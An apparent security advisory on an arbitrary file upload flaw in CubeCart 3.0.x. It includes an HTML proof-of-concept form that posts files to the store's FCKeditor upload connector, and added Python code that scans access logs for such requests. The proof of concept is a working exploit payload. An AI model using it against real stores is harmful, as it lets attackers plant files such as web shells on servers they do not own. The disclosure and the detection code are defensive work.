Title: CubeCart Arbitrary File Upload Vulnerability
Published: 2006-02-23-12:00AM
Updated: 2006-02-24-07:02PM
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Credit: NSA Group is credited with the discovery of this vulnerability.
Vulnerable:
  CubeCart CubeCart 3.0.7 pl1
  CubeCart CubeCart 3.0.6
  CubeCart CubeCart 3.0.4
  CubeCart CubeCart 3.0.3
Not Vulnerable:
  CubeCart CubeCart 3.0.7
Code: This issue can be exploited with a web client.

The following proof of concept is available:
<form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>
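
An added example (not part of the original advisory and not CubeCart code): a check a defender can run over web server access logs to find POST requests of the shape shown in the proof of concept above. It assumes the Apache/nginx "combined" log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Path suffix of the upload connector, taken from the proof of concept.
CONNECTOR_SUFFIX = "/filemanager/browser/default/connectors/php/connector.php"


def is_upload_request(method, target):
    """True for a POST to the connector carrying Command=FileUpload."""
    parts = urlsplit(target)
    # Decode %xx escapes and collapse repeated slashes before comparing.
    path = re.sub(r"/{2,}", "/", unquote(parts.path)).lower()
    if method != "POST" or not path.endswith(CONNECTOR_SUFFIX):
        return False
    params = parse_qsl(parts.query, keep_blank_values=True)
    return any(k.lower() == "command" and v.lower() == "fileupload"
               for k, v in params)


def find_upload_hits(lines):
    """Return (ip, timestamp, status) for each log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_upload_request(m["method"], m["target"]):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
_URL = "/cubedir/admin/includes/rte/editor" + CONNECTOR_SUFFIX
SAMPLE_LOG = [
    f'203.0.113.5 - - [23/Feb/2006:10:01:02 +0000] "POST {_URL}?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 312',
    f'203.0.113.5 - - [23/Feb/2006:10:01:09 +0000] "GET {_URL}?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 150',
    '198.51.100.7 - - [23/Feb/2006:10:02:00 +0000] "POST /cubedir/index.php HTTP/1.1" 200 5120',
    f'198.51.100.9 - - [23/Feb/2006:10:03:30 +0000] "POST {_URL.replace("/php/", "/%70hp/")}?command=fileupload HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for ip, ts, status in find_upload_hits(SAMPLE_LOG):
        print(f"{ts}  {ip}  HTTP {status}  POST to upload connector")
```

A hit with a 2xx status is the one to follow up first: compare its timestamp against files that appeared in the web root around that time.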
Copyright 2007, SecurityDot